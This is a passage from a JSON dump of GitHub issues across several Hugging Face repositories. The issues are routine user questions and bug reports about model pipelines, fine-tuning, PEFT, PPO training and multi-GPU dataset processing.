(node:internal/fs/watchers:247:19)\r\n at Object.watch (node:fs:2418:34)\r\n at createFsWatchInstance (file:///home/alvyn/chat-ui/node_modules/vite/dist/node/chunks/dep-e8f070e8.js:50470:17)\r\n at setFsWatchListener (file:///home/alvyn/chat-ui/node_modules/vite/dist/node/chunks/dep-e8f070e8.js:50517:15)\r\n at NodeFsHandler._watchWithNodeFs (file:///home/alvyn/chat-ui/node_modules/vite/dist/node/chunks/dep-e8f070e8.js:50672:14)\r\n at NodeFsHandler._handleFile (file:///home/alvyn/chat-ui/node_modules/vite/dist/node/chunks/dep-e8f070e8.js:50736:23)\r\n at NodeFsHandler._addToNodeFs (file:///home/alvyn/chat-ui/node_modules/vite/dist/node/chunks/dep-e8f070e8.js:50978:21)\r\n at async file:///home/alvyn/chat-ui/node_modules/vite/dist/node/chunks/dep-e8f070e8.js:51973:21\r\n at async Promise.all (index 1)\r\nEmitted 'error' event on FSWatcher instance at:\r\n at FSWatcher._handleError (file:///home/alvyn/chat-ui/node_modules/vite/dist/node/chunks/dep-e8f070e8.js:52169:10)\r\n at NodeFsHandler._addToNodeFs (file:///home/alvyn/chat-ui/node_modules/vite/dist/node/chunks/dep-e8f070e8.js:50986:18)\r\n at async file:///home/alvyn/chat-ui/node_modules/vite/dist/node/chunks/dep-e8f070e8.js:51973:21\r\n at async Promise.all (index 1) {\r\n errno: -28,\r\n syscall: 'watch',\r\n code: 'ENOSPC',\r\n path: '/home/alvyn/chat-ui/vite.config.ts',\r\n filename: '/home/alvyn/chat-ui/vite.config.ts'\r\n}\r\n", "url": "https://github.com/huggingface/chat-ui/issues/420", "state": "closed", "labels": [ "support" ], "created_at": "2023-08-29T14:54:49Z", "updated_at": "2023-09-20T15:11:26Z", "comments": 2, "user": "alvynabranches" }, { "repo": "huggingface/transformers.js", "number": 268, "title": "[Question] Chunks from transcription always empty text", "body": "This example works fine: \r\n![image](https://github.com/xenova/transformers.js/assets/216566/970c3828-8fbf-4539-843d-a96554c72f4b)\r\n\r\nBut ATM I am sending Float32 to the worker here (i also confirm the audio is valid by playing it back)\r\nhttps://github.com/quantuminformation/coherency/blob/main/components/audio-recorder.js#L104\r\n\r\nBut after transcribing here:\r\nhttps://github.com/quantuminformation/coherency/blob/main/worker.js#L140\r\n\r\nmy chunks only contain `\"\"`\r\n\r\n![image](https://github.com/xenova/transformers.js/assets/216566/04588e73-2ee5-4f39-a145-f4e87c392ba1)\r\n\r\n![image](https://github.com/xenova/transformers.js/assets/216566/febe2809-0fa7-4e21-8b71-d5724a391644)\r\n\r\nany ideas where my setup is going wrong?\r\n", "url": "https://github.com/huggingface/transformers.js/issues/268", "state": "open", "labels": [ "question" ], "created_at": "2023-08-29T13:49:00Z", "updated_at": "2023-11-04T19:48:30Z", "user": "quantuminformation" }, { "repo": "huggingface/diffusers", "number": 4831, "title": "How to preview the image during generation,any demo for gradio?", "body": "How to preview the image during generation,any demo for gradio?", "url": "https://github.com/huggingface/diffusers/issues/4831", "state": "closed", "labels": [], "created_at": "2023-08-29T13:32:07Z", "updated_at": "2023-08-30T15:31:31Z", "user": "wodsoe" }, { "repo": "huggingface/transformers.js", "number": 267, "title": "[Question] multilingual-e5-* models don't work with pipeline", "body": "I just noticed that the `Xenova/multilingual-e5-*` model family doesn't work in the transformers.js pipeline for feature-extraction with your (@xenova) onnx versions on HF.\r\n\r\nMy code throws an error.\r\n\r\n```Javascript\r\nimport { pipeline } from 
'https://cdn.jsdelivr.net/npm/@xenova/transformers@2.5.4';\r\n\r\nasync function allocatePipeline() {\r\n let pipe = await pipeline(\"feature-extraction\", \"Xenova/multilingual-e5-small\");\r\n let out = await pipe(\"I love transformers\", { pooling: 'mean', normalize: false });\r\n\r\n document.getElementById(\"output\").innerHTML = out.data;\r\n}\r\n\r\nallocatePipeline();\r\n```\r\n\r\nLive example [here](https://geo.rocks/minimal-transformersjs-example-gte).\r\n\r\n```\r\nUncaught (in promise) Error: An error occurred during model execution: \"Missing the following inputs: token_type_ids.\r\n at transformers@2.5.4:70:5612\r\n at y (transformers@2.5.4:70:5971)\r\n at M (transformers@2.5.4:70:8450)\r\n at transformers@2.5.4:70:10792\r\n at Function.forward (transformers@2.5.4:70:10799)\r\n at Function._call (transformers@2.5.4:70:10675)\r\n at Function.e [as model] (transformers@2.5.4:88:508)\r\n at Function._call (transformers@2.5.4:73:1424)\r\n at Function._call (transformers@2.5.4:73:6152)\r\n at e (transformers@2.5.4:88:508)\r\n```\r\n\r\nHowever, HF user Supabase converted the models differently so that they are actually usable with the pipeline, e.g. [gte-small](https://huggingface.co/Supabase/gte-small#javascript). I noticed that Supabase added the vocab.txt file - is it possible that this or other files are missing in your versions or is there a more complex reason for this?\r\n\r\nI'm pretty interested in the gte family as they are the most performant small models currently available (according to the MTEB leaderboard).", "url": "https://github.com/huggingface/transformers.js/issues/267", "state": "closed", "labels": [ "question" ], "created_at": "2023-08-29T12:39:26Z", "updated_at": "2023-08-30T12:05:02Z", "user": "do-me" }, { "repo": "huggingface/transformers", "number": 25803, "title": "[Model] How to evaluate Idefics Model's ability with in context examples?", "body": "Hi the recent release of Idefics-9/80B-Instruct model is superbly promising! \r\n\r\nWe would like to evaluate them on a customized benchmarks with in context examples. May I ask how should I arrange the prompt template, especially for `instruct` version? \r\n\r\nWe had some problems previously when evaluating the model on single images, the model will ramble and wont stop, but managed to resolve them somehow.\r\n\r\nFor single image we use the template to evaluate instruct version model.\r\n```\r\nUser:{prompt} Assistant:\r\n```\r\n\r\nWould it be perfectly correct (matching your training template?) or do you have better recommendation. Sorry we have a customized pipeline so it's not easy to adopt your designed `IdeficsProcessor`. 
\ud83d\ude2d\r\n\r\nAlso we migrate the code on `image_attention_mask` with \r\n```\r\n# supporting idefics processing\r\ndef get_formatted_prompt(prompt: str=\"\", in_context_prompts: list = []) -> str:\r\n # prompts = [\r\n # \"User:\",\r\n # \"https://hips.hearstapps.com/hmg-prod/images/cute-photos-of-cats-in-grass-1593184777.jpg\",\r\n # \"Describe this image.\\nAssistant: An image of two kittens in grass.\\n\",\r\n # \"User:\",\r\n # \"http://images.cocodataset.org/train2017/000000190081.jpg\",\r\n # \"Describe this image.\\nAssistant:\",\r\n # ]\r\n # prompts = f\"User:{prompt} Assistant:\"\r\n prompts = f\"User:{prompt} Assistant:\"\r\n return prompts\r\n\r\ndef get_image_attention_mask(output_input_ids, max_num_images, tokenizer, include_image=True):\r\n # image_attention_mask, _ = image_attention_mask_for_packed_input_ids(output_input_ids, tokenizer)\r\n # image_attention_mask = incremental_to_binary_attention_mask(image_attention_mask, num_classes=max_num_images)\r\n if include_image:\r\n image_attention_mask, _ = image_attention_mask_for_packed_input_ids(output_input_ids, tokenizer)\r\n image_attention_mask = incremental_to_binary_attention_mask(\r\n image_attention_mask, num_classes=max_num_images\r\n )\r\n else:\r\n # in full language mode we set the image mask to all-0s\r\n image_attention_mask = torch.zeros(\r\n output_input_ids.shape[0], output_input_ids.shape[1], 1, dtype=torch.bool\r\n )\r\n return image_attention_mask\r\n\r\nlang_x = self.tokenizer(\r\n [\r\n get_formatted_prompt(question, []),\r\n ],\r\n return_tensors=\"pt\",\r\n)\r\nimage_attention_mask = get_image_attention_mask(lang_x['input_ids'], 1, self.tokenizer)\r\n```\r\n\r\nI have read all related blogs and docs but still got confused about the usage of ``. Is it used to break the in context examples with query example? \r\n\r\nMy guess is\r\n```\r\nUser:{in_context_prompt} Assistant: {in_context_answer} User:{prompt} Assistant:\r\n```\r\n\r\nBesides, very curious that the model would generate the normal `` at the last of sentence instead of normal llama's `<|endofchunk|>`?\r\n\r\n", "url": "https://github.com/huggingface/transformers/issues/25803", "state": "closed", "labels": [], "created_at": "2023-08-28T19:39:02Z", "updated_at": "2023-10-11T08:06:48Z", "user": "Luodian" }, { "repo": "huggingface/chat-ui", "number": 417, "title": "CodeLlama Instruct Configuration", "body": "Hello Guys, \r\n\r\nCould you guide me in the right direction to get the configuration of the Code Llama Instruct model right? \r\n\r\nI have this config so far: \r\n\r\n```\r\n {\r\n \"name\": \"Code Llama\",\r\n \"endpoints\": [{\"url\": \"http://127.0.0.1:8080\"}],\r\n \"description\": \"Programming Assistant\",\r\n \"userMessageToken\": \"[INST]\",\r\n \r\n \"assistantMessageToken\": \"[/INST]\",\r\n\r\n \"parameters\": {\r\n \"temperature\": 0.9,\r\n \"top_p\": 0.95,\r\n \"repetition_penalty\": 1.2,\r\n \"top_k\": 50,\r\n \"truncate\": 1000,\r\n \"max_new_tokens\": 1048\r\n }\r\n }\r\n```\r\n\r\nThe model starts with the \"right\" output, but then it produces garbage. \r\n\r\nI am running the TGI backend. \r\n\r\nThx!", "url": "https://github.com/huggingface/chat-ui/issues/417", "state": "open", "labels": [ "support", "models" ], "created_at": "2023-08-28T13:42:09Z", "updated_at": "2023-09-13T18:17:50Z", "comments": 9, "user": "schauppi" }, { "repo": "huggingface/transformers.js", "number": 265, "title": "Unexpected token", "body": "I added this code to my React project. 
\r\n\r\n```\r\nimport { pipeline } from \"@xenova/transformers\";\r\n\r\nasync function sentimentAnalysis() {\r\n // Allocate a pipeline for sentiment-analysis\r\n let pipe = await pipeline(\"sentiment-analysis\");\r\n let out = await pipe(\"I love transformers!\");\r\n console.log(out);\r\n}\r\n\r\nsentimentAnalysis();\r\n```\r\nI am surprised the docs don't tell me to download a model, so I think this code will auto-download it... anyway I get this issue...\r\n./node_modules/@xenova/transformers/src/env.js 38:84\r\nModule parse failed: Unexpected token (38:84)\r\nFile was processed with these loaders:\r\n * ./node_modules/babel-loader/lib/index.js\r\nYou may need an additional loader to handle the result of these loaders.\r\n| \r\n| var RUNNING_LOCALLY = FS_AVAILABLE && PATH_AVAILABLE;\r\n> var __dirname = RUNNING_LOCALLY ? path.dirname(path.dirname(url.fileURLToPath(import.meta.url))) : './';\r\n| \r\n| // Only used for environments with access to file system\r\n\r\n\r\nSeems like I need access to the filesystem... but that can't be right because this runs in the browser ... ?", "url": "https://github.com/huggingface/transformers.js/issues/265", "state": "closed", "labels": [ "question" ], "created_at": "2023-08-28T13:34:42Z", "updated_at": "2023-08-28T16:00:10Z", "user": "patrickinminneapolis" }, { "repo": "huggingface/diffusers", "number": 4814, "title": "How to add more weight to the text prompt in ControlNet?", "body": "Hi,\r\n\r\nI want to know if there is a quick way of adding more weight to the text prompt in ControlNet during inference.\r\nIf so, which parameter needs to be changed? \r\n\r\nThanks,", "url": "https://github.com/huggingface/diffusers/issues/4814", "state": "closed", "labels": [ "stale" ], "created_at": "2023-08-28T13:05:16Z", "updated_at": "2023-10-30T15:07:45Z", "user": "miquel-espinosa" }, { "repo": "huggingface/autotrain-advanced", "number": 239, "title": "how to start without \" pip install autotrain-advanced\"", "body": "Dear, \r\n\r\nThanks for your work.\r\n\r\nAfter installing through `pip`, running\r\n\r\n**`autotrain llm --train --project_name my-llm --model luodian/llama-7b-hf --data_path . --use_peft --use_int4 --learning_rate 2e-4 --train_batch_size 12 --num_train_epochs 3 --trainer sft`**\r\n\r\ncan achieve fine-tuning on your own data. \r\n\r\nIf I want to run the project from source code for fine-tuning, which function should I start from?\r\nThat is, from which function do the `autotrain` and `llm` parameters come from? \r\n\r\nBest,\r\n", "url": "https://github.com/huggingface/autotrain-advanced/issues/239", "state": "closed", "labels": [], "created_at": "2023-08-28T10:02:37Z", "updated_at": "2023-12-18T15:30:42Z", "user": "RedBlack888" }, { "repo": "huggingface/datasets", "number": 6186, "title": "Feature request: add code example of multi-GPU processing", "body": "### Feature request\r\n\r\nWould be great to add a code example of how to do multi-GPU processing with \ud83e\udd17 Datasets in the documentation. cc @stevhliu\r\n\r\nCurrently the docs has a small [section](https://huggingface.co/docs/datasets/v2.3.2/en/process#map) on this saying \"your big GPU call goes here\", however it didn't work for me out-of-the-box.\r\n\r\nLet's say you have a PyTorch model that can do translation, and you have multiple GPUs. 
In that case, you'd like to duplicate the model on each GPU, each processing (translating) a chunk of the data in parallel.\r\n\r\nHere's how I tried to do that:\r\n\r\n```\r\nfrom datasets import load_dataset\r\nfrom transformers import AutoModelForSeq2SeqLM, AutoTokenizer\r\nfrom multiprocess import set_start_method\r\nimport torch\r\nimport os\r\n\r\ndataset = load_dataset(\"mlfoundations/datacomp_small\")\r\n\r\ntokenizer = AutoTokenizer.from_pretrained(\"facebook/nllb-200-distilled-600M\")\r\nmodel = AutoModelForSeq2SeqLM.from_pretrained(\"facebook/nllb-200-distilled-600M\")\r\n\r\n# put model on each available GPU\r\n# also, should I do it like this or use nn.DataParallel?\r\nmodel.to(\"cuda:0\")\r\nmodel.to(\"cuda:1\")\r\n\r\nset_start_method(\"spawn\")\r\n\r\ndef translate_captions(batch, rank):\r\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = str(rank % torch.cuda.device_count())\r\n \r\n texts = batch[\"text\"]\r\n inputs = tokenizer(texts, padding=True, truncation=True, return_tensors=\"pt\").to(model.device)\r\n\r\n translated_tokens = model.generate(\r\n **inputs, forced_bos_token_id=tokenizer.lang_code_to_id[\"eng_Latn\"], max_length=30\r\n )\r\n translated_texts = tokenizer.batch_decode(translated_tokens, skip_special_tokens=True)\r\n\r\n batch[\"translated_text\"] = translated_texts\r\n \r\n return batch\r\n\r\nupdated_dataset = dataset.map(translate_captions, with_rank=True, num_proc=2, batched=True, batch_size=256)\r\n```\r\n\r\nI've personally tried running this script on a machine with 2 A100 GPUs.\r\n\r\n## Error 1\r\n\r\nRunning the code snippet above from the terminal (python script.py) resulted in the following error:\r\n\r\n```\r\nTraceback (most recent call last):\r\n File \"\", line 1, in \r\n File \"/home/niels/anaconda3/envs/datacomp/lib/python3.10/site-packages/multiprocess/spawn.py\", line 116, in spawn_main\r\n exitcode = _main(fd, parent_sentinel)\r\n File \"/home/niels/anaconda3/envs/datacomp/lib/python3.10/site-packages/multiprocess/spawn.py\", line 125, in _main\r\n prepare(preparation_data)\r\n File \"/home/niels/anaconda3/envs/datacomp/lib/python3.10/site-packages/multiprocess/spawn.py\", line 236, in prepare\r\n _fixup_main_from_path(data['init_main_from_path'])\r\n File \"/home/niels/anaconda3/envs/datacomp/lib/python3.10/site-packages/multiprocess/spawn.py\", line 287, in _fixup_main_from_path\r\n main_content = runpy.run_path(main_path,\r\n File \"/home/niels/anaconda3/envs/datacomp/lib/python3.10/runpy.py\", line 289, in run_path\r\n return _run_module_code(code, init_globals, run_name,\r\n File \"/home/niels/anaconda3/envs/datacomp/lib/python3.10/runpy.py\", line 96, in _run_module_code\r\n _run_code(code, mod_globals, init_globals,\r\n File \"/home/niels/anaconda3/envs/datacomp/lib/python3.10/runpy.py\", line 86, in _run_code\r\n exec(code, run_globals)\r\n File \"/home/niels/python_projects/datacomp/datasets_multi_gpu.py\", line 16, in \r\n set_start_method(\"spawn\")\r\n File \"/home/niels/anaconda3/envs/datacomp/lib/python3.10/site-packages/multiprocess/context.py\", line 247, in set_start_method\r\n raise RuntimeError('context has already been set')\r\nRuntimeError: context has already been set\r\n```\r\n\r\n## Error 2\r\nThen, based on [this Stackoverflow answer](https://stackoverflow.com/a/71616344/7762882), I put the `set_start_method(\"spawn\")` section in a try: catch block. 
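Concretely, that change is roughly the following (`set_start_method` can only succeed once per process):\r\n\r\n```\r\ntry:\r\n    set_start_method(\"spawn\")\r\nexcept RuntimeError:\r\n    # the start method / context was already set, so just keep going\r\n    pass\r\n```\r\n\r\n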
This resulted in the following error:\r\n```\r\nFile \"/home/niels/anaconda3/envs/datacomp/lib/python3.10/site-packages/datasets/dataset_dict.py\", line 817, in \r\n k: dataset.map(\r\n File \"/home/niels/anaconda3/envs/datacomp/lib/python3.10/site-packages/datasets/arrow_dataset.py\", line 2926, in map\r\n with Pool(nb_of_missing_shards, initargs=initargs, initializer=initializer) as pool:\r\n File \"/home/niels/anaconda3/envs/datacomp/lib/python3.10/site-packages/multiprocess/context.py\", line 119, in Pool\r\n return Pool(processes, initializer, initargs, maxtasksperchild,\r\n File \"/home/niels/anaconda3/envs/datacomp/lib/python3.10/site-packages/multiprocess/pool.py\", line 215, in __init__\r\n self._repopulate_pool()\r\n File \"/home/niels/anaconda3/envs/datacomp/lib/python3.10/site-packages/multiprocess/pool.py\", line 306, in _repopulate_pool\r\n return self._repopulate_pool_static(self._ctx, self.Process,\r\n File \"/home/niels/anaconda3/envs/datacomp/lib/python3.10/site-packages/multiprocess/pool.py\", line 329, in _repopulate_pool_static\r\n w.start()\r\n File \"/home/niels/anaconda3/envs/datacomp/lib/python3.10/site-packages/multiprocess/process.py\", line 121, in start\r\n self._popen = self._Popen(self)\r\n File \"/home/niels/anaconda3/envs/datacomp/l", "url": "https://github.com/huggingface/datasets/issues/6186", "state": "closed", "labels": [ "documentation", "enhancement" ], "created_at": "2023-08-28T10:00:59Z", "updated_at": "2024-10-07T09:39:51Z", "comments": 18, "user": "NielsRogge" }, { "repo": "huggingface/autotrain-advanced", "number": 238, "title": "How to Train Consecutively Using Checkpoints", "body": "Hi, I've been using your project and it's been great.\r\nI'm a complete beginner in the field of AI, so sorry for such a basic question.\r\nIs there a way to train consecutively with checkpoints?\r\n\r\nThank you!\r\n", "url": "https://github.com/huggingface/autotrain-advanced/issues/238", "state": "closed", "labels": [], "created_at": "2023-08-28T08:31:30Z", "updated_at": "2023-12-18T15:30:42Z", "user": "YOUNGASUNG" }, { "repo": "huggingface/transformers.js", "number": 264, "title": "[Question] TypeScript rewrite", "body": "\r\nHi Joshua. I found your idea is extremely exciting.\r\nI am a frontend developer who has worked on TypeScript professionally for three years. Would you mind me doing a TypeScript re-write, so this npm package can have a better DX. If I successfully transform the codebase into TypeScript and pass all the tests, would you mind merging it into main?\r\n\r\nI just forked this repo. 
https://github.com/Lantianyou/transformers.js", "url": "https://github.com/huggingface/transformers.js/issues/264", "state": "open", "labels": [ "question" ], "created_at": "2023-08-28T08:29:06Z", "updated_at": "2024-04-27T12:05:24Z", "user": "Lantianyou" }, { "repo": "huggingface/text-generation-inference", "number": 934, "title": "How to use fine tune model in text-generation-inference", "body": "Hi Team,\r\nI fine-tuned the Llama 2 13B model and merged it using the merge_and_upload() functionality.\r\nHow can I use this merged model with text-generation-inference?\r\n\r\n**The following command gives an error**\r\n![image](https://github.com/huggingface/text-generation-inference/assets/7765864/22e51673-4a4f-47ba-9b06-158ec7812951)\r\n**Error**\r\n![image](https://github.com/huggingface/text-generation-inference/assets/7765864/00f219ea-0483-4496-af11-9ce9d949a7d2)\r\n", "url": "https://github.com/huggingface/text-generation-inference/issues/934", "state": "closed", "labels": [], "created_at": "2023-08-28T07:36:25Z", "updated_at": "2023-08-28T08:53:28Z", "user": "chintanshrinath" }, { "repo": "huggingface/peft", "number": 869, "title": "How to correctly use Prefixing Tuning?", "body": "### System Info\r\n\r\npeft 0.5.0\r\ntransformers 4.32.0\r\n\r\n### Who can help?\r\n\r\n_No response_\r\n\r\n### Information\r\n\r\n- [ ] The official example scripts\r\n- [X] My own modified scripts\r\n\r\n### Tasks\r\n\r\n- [ ] An officially supported task in the `examples` folder\r\n- [ ] My own task or dataset (give details below)\r\n\r\n### Reproduction\r\n\r\n```\r\nmodel = AutoModelForSeq2SeqLM.from_pretrained('bigscience/T0pp', load_in_8bit=True)\r\nmodel = prepare_model_for_int8_training(model)\r\nconfig = PrefixTuningConfig(\r\n task_type=TaskType.SEQ_2_SEQ_LM,\r\n num_virtual_tokens=100,\r\n token_dim=model.config.hidden_size,\r\n num_transformer_submodules=1,\r\n num_attention_heads=model.config.num_heads,\r\n num_layers=model.config.num_layers,\r\n encoder_hidden_size=1792,\r\n)\r\nmodel = get_peft_model(model, config)\r\n```\r\n\r\n### Expected behavior\r\n\r\nI'm assuming `num_layers`, `num_attention_heads`, and `token_dim` need to match the base model. In the sample, `num_transformer_submodules` is 1, but an encoder-decoder model has two transformers, right? Should this be 2? \r\n\r\n\r\nWhen I run the code above I get\r\n\r\n```\r\nFile \"/python3.10/site-packages/transformers/models/t5/modeling_t5.py\", line 551, in forward\r\nposition_bias = position_bias + mask # (batch_size, n_heads, seq_length, key_length)\r\nRuntimeError: The size of tensor a (3) must match the size of tensor b (103) at non-singleton dimension 3\r\n```\r\nWhen I print out the shapes of `position_bias` and `mask`, `mask` has 100 more tokens than `position_bias`, seemingly on the decoder side. It's also taking in the prefix embeddings.", "url": "https://github.com/huggingface/peft/issues/869", "state": "closed", "labels": [], "created_at": "2023-08-27T18:03:06Z", "updated_at": "2024-11-05T09:49:01Z", "user": "Vincent-Li-9701" }, { "repo": "huggingface/transformers", "number": 25783, "title": "How to re-tokenize the training set in each epoch?", "body": "I have a special tokenizer which can tokenize a sentence based on some probability distribution.\r\nFor example, 'I like green apple' -> '[I],[like],[green],[apple]' (30%) or '[I],[like],[green apple]' (70%).\r\nNow, in the training part, I want the Trainer to retokenize the dataset in each epoch. 
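One idea I had is to skip pre-tokenization and tokenize lazily inside the dataset, so that every epoch re-samples a segmentation - a rough, untested sketch:\r\n\r\n```\r\nimport torch\r\n\r\nclass ResampleDataset(torch.utils.data.Dataset):\r\n    def __init__(self, texts, tokenizer):\r\n        self.texts = texts\r\n        self.tokenizer = tokenizer\r\n\r\n    def __len__(self):\r\n        return len(self.texts)\r\n\r\n    def __getitem__(self, idx):\r\n        # tokenization happens on every access, so each epoch draws a\r\n        # fresh segmentation from the tokenizer's probability distribution\r\n        enc = self.tokenizer(self.texts[idx], truncation=True)\r\n        enc[\"labels\"] = enc[\"input_ids\"].copy()\r\n        return enc\r\n```\r\n\r\nBut I'm not sure this is the intended way with `Trainer`. 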
How can I do so?", "url": "https://github.com/huggingface/transformers/issues/25783", "state": "closed", "labels": [], "created_at": "2023-08-27T16:23:25Z", "updated_at": "2023-09-01T13:01:43Z", "user": "tic-top" }, { "repo": "huggingface/optimum", "number": 1318, "title": "Is it possible to compile pipeline (with tokenizer) to ONNX Runtime?", "body": "### Feature request\n\nIs it possible to compile the entire pipeline, tokenizer and transformer, to run with ONNX Runtime? My goal is to remove the `transformers` dependency entirely for runtime, to reduce serverless cold start.\n\n### Motivation\n\nI could not find any examples, and could not make this work, so I wonder if compiling tokenizer with ONNX is possible at all.\n\n### Your contribution\n\nI could try implementing this, or add an example to documentation if this is possible already.", "url": "https://github.com/huggingface/optimum/issues/1318", "state": "open", "labels": [ "feature-request", "onnxruntime" ], "created_at": "2023-08-26T17:57:52Z", "updated_at": "2023-08-28T07:58:13Z", "comments": 1, "user": "j-adamczyk" }, { "repo": "huggingface/trl", "number": 695, "title": "Reward is getting lower and lower with each epoch, What can be the issue in training?", "body": "Hello,\r\n\r\nI am trying to optimize a T5 fine-tuned model for text generation task. At the moment, I am using BLEU score (between two texts) as a reward function. Before the optimization with PPO, model is able to produce an average BLEU score of 35% however with ppo, after each epoch, the reward is reducing so far. What is something I am doing wrong or should look into as I am new to RL? as the goal of PPO is to improve the reward or atleast make it more than the original bleu score of 35% that we got before model was optimized with PPO. 
\r\nThis is my code (I have added the imports it needs):\r\n\r\n```\r\nimport torch\r\nimport numpy as np\r\nfrom nltk.translate.bleu_score import sentence_bleu\r\nfrom trl import AutoModelForSeq2SeqLMWithValueHead, PPOConfig, PPOTrainer\r\nfrom trl.core import LengthSampler\r\n\r\n# loading the fine-tuned model\r\nactive_model = AutoModelForSeq2SeqLMWithValueHead.from_pretrained('small_gen_clean_prem/')\r\nref_model = AutoModelForSeq2SeqLMWithValueHead.from_pretrained('small_gen_clean_prem/')\r\n\r\nbatch_size = 200\r\nconfig = PPOConfig(\r\n batch_size=batch_size,\r\n learning_rate=1.41e-5,\r\n mini_batch_size=16,\r\n gradient_accumulation_steps=1 # if I set it to more than 1, I get an empty tensors error\r\n)\r\n\r\nppo_trainer = PPOTrainer(config, active_model, ref_model, tokenizer)\r\n\r\n\r\ngeneration_kwargs = {\r\n \"min_length\": -1,\r\n \"top_k\": 0.0,\r\n \"top_p\": 1.0,\r\n \"do_sample\": True,\r\n \"pad_token_id\": tokenizer.eos_token_id\r\n}\r\n\r\n\r\noutput_min_length = 4\r\noutput_max_length = 512\r\noutput_length_sampler = LengthSampler(output_min_length, output_max_length)\r\n\r\n\r\nscore_all=[]\r\nfor i in range(20):\r\n input_tensors=[]\r\n output_tensors=[]\r\n score_=[]\r\n for data in valid_dataset:\r\n query_txt = data['input']\r\n query_tensor = tokenizer.encode(query_txt, return_tensors=\"pt\").to(device)\r\n input_tensors.append(query_tensor.squeeze(0))\r\n desired_txt = data['ground_truth']\r\n print('desired text\\n:',desired_txt)\r\n response_tensor = ppo_trainer.generate([item for item in query_tensor], return_prompt=False,length_sampler=output_length_sampler, **generation_kwargs)\r\n response_txt = tokenizer.decode(response_tensor[0], skip_special_tokens=True, max_new_tokens=512)\r\n output_tensors.append(response_tensor[0].squeeze(0))\r\n\r\n score = sentence_bleu([response_txt.split(),desired_txt.split()])\r\n score_.append(score)\r\n\r\n reward = [torch.FloatTensor([score]) for score in score_]\r\n\r\n score_all.append(np.mean(score_))\r\n\r\n train_stats = ppo_trainer.step(input_tensors,output_tensors,reward)\r\n```\r\nIn the graph attached, the y-axis is the average mean score in each epoch.\r\n\r\n\"scores_ppo\"\r\n", "url": "https://github.com/huggingface/trl/issues/695", "state": "closed", "labels": [], "created_at": "2023-08-26T00:22:04Z", "updated_at": "2023-11-01T15:06:14Z", "user": "sakinafatima" }, { "repo": "huggingface/dataset-viewer", "number": 1733, "title": "Add API fuzzer to the tests?", "body": "Tools exist, see https://openapi.tools/", "url": "https://github.com/huggingface/dataset-viewer/issues/1733", "state": "closed", "labels": [ "question", "tests" ], "created_at": "2023-08-25T21:44:10Z", "updated_at": "2023-10-04T15:04:16Z", "user": "severo" }, { "repo": "huggingface/diffusers", "number": 4778, "title": "[Discussion] How to allow for more dynamic prompt_embed scaling/weighting/fusion?", "body": "We have a couple of issues and requests for the community that ask for the possibility to **dynamically** change certain knobs of Stable Diffusion that are applied at **every denoising step**. \r\n\r\n- 1. **Prompt Fusion**, as stated [here](https://github.com/huggingface/diffusers/issues/4496). To implement prompt fusion in a general way we need to give the user the possibility to define some kind of \"prompt\" scheduler where every denoising timestep can receive a different `prompt_embeds` and `negative_prompt_embeds`. \r\n\r\n=> A very obvious way to allow for this would be to allow passing a list of lists of prompts and a list of lists of `prompt_embeddings`\r\n\r\n- 2. **Dynamic prompt weighting**. A1111 and InvokeAI both have functionalities that allow weighting the prompt embeddings differently at each timestep. 
InvokeAI has this implemented in `compel` via a `conditioning_scheduler` see here: https://github.com/damian0815/compel/blob/d15e883bbbfae5b3fbd8d60065aa330c99a662b4/src/compel/compel.py#L93 \r\nSuch a scheduler could for example allow the user to not just define a unique `prompt_embedding` condition (e.g. putting more word on a certain word), but also allowing to dynamically change that condition during the course of denoising.\r\nThis is also asked by SD.Next (cc @vladmandic).\r\n\r\n=> Here we have a couple of options, the simplest is probably to just allow passing a list of `prompt_embeddings` assuming that the user just takes care of the prompt weighting themselves. We could then also nicely integrate this with `compel`.\r\n\r\n- 3. **Dynamic `guidance_scale` / `cfg` weighting**. Many people have found that a `cfg` scheduling works really well for `SDXL`. It's related to 2. as it's also a knob to tweak text embeddings weights over the course of inference but it's much more global where as 2. is can be more condition specific. This is also related to https://github.com/huggingface/diffusers/pull/4569#issuecomment-1678667625 which proposes dynamic scaling.\r\n\r\n=> Here we could solve this by allowing the user to provide a list of `guidance_scales`. In addition we could maybe introduce something like `guidance_scaling_type=\"static/dynamic\" to allow for #4569 \r\n\r\n**Overall**:\r\n\r\n=> It's not too difficult to make these features work, but it'll require some very good docs about `prompt_embeds` and `negative_prompt_embeds`. We also have to think about edge cases like SDXL which has two text encoders. We also have to think about how this can be applied to other models such as Kandinsky, IF.\r\n\r\nCurios to hear your thoughts here. Also would love to discuss a design proposal of how we can better support things in a coherent, library-wide design @sayakpaul @williamberman @yiyixuxu @DN6 ", "url": "https://github.com/huggingface/diffusers/issues/4778", "state": "closed", "labels": [ "stale" ], "created_at": "2023-08-25T10:03:17Z", "updated_at": "2023-11-09T21:42:39Z", "user": "patrickvonplaten" }, { "repo": "huggingface/transformers.js", "number": 260, "title": "[Question] CDN download for use in a worker", "body": "Is there a way to get this to work inside a worker:\r\n```html\r\n\r\n```\r\nI noticed you do this: \r\n```js\r\nimport { pipeline, env } from \"@xenova/transformers\";\r\n```\r\n\r\n\r\nI'm trying to avoid any node modules for this project I am on", "url": "https://github.com/huggingface/transformers.js/issues/260", "state": "closed", "labels": [ "question" ], "created_at": "2023-08-24T18:24:51Z", "updated_at": "2023-08-29T13:57:19Z", "user": "quantuminformation" }, { "repo": "huggingface/notebooks", "number": 428, "title": "How to load idefics fine tune model for inference?", "body": "Hi, recently I fine tune idefics model with peft. I am not able to load the model. \r\nIs there any way to load the model with peft back for inference? ", "url": "https://github.com/huggingface/notebooks/issues/428", "state": "open", "labels": [], "created_at": "2023-08-24T13:39:22Z", "updated_at": "2024-04-25T10:39:55Z", "user": "imrankh46" }, { "repo": "huggingface/peft", "number": 857, "title": "How to load fine tune IDEFICS model with peft for inference?", "body": "### Feature request\r\n\r\nRequest for IDEFICS model. 
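What I am trying amounts to the hedged sketch below (the adapter path is a placeholder), and a dedicated Auto class could simply wrap this:\r\n\r\n```\r\nfrom transformers import IdeficsForVisionText2Text\r\nfrom peft import PeftModel\r\n\r\nbase = IdeficsForVisionText2Text.from_pretrained(\"HuggingFaceM4/idefics-9b-instruct\")\r\n# adapter repo id below is a placeholder for my fine-tuned adapter\r\nmodel = PeftModel.from_pretrained(base, \"my-username/my-idefics-adapter\")\r\nmodel.eval()\r\n```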
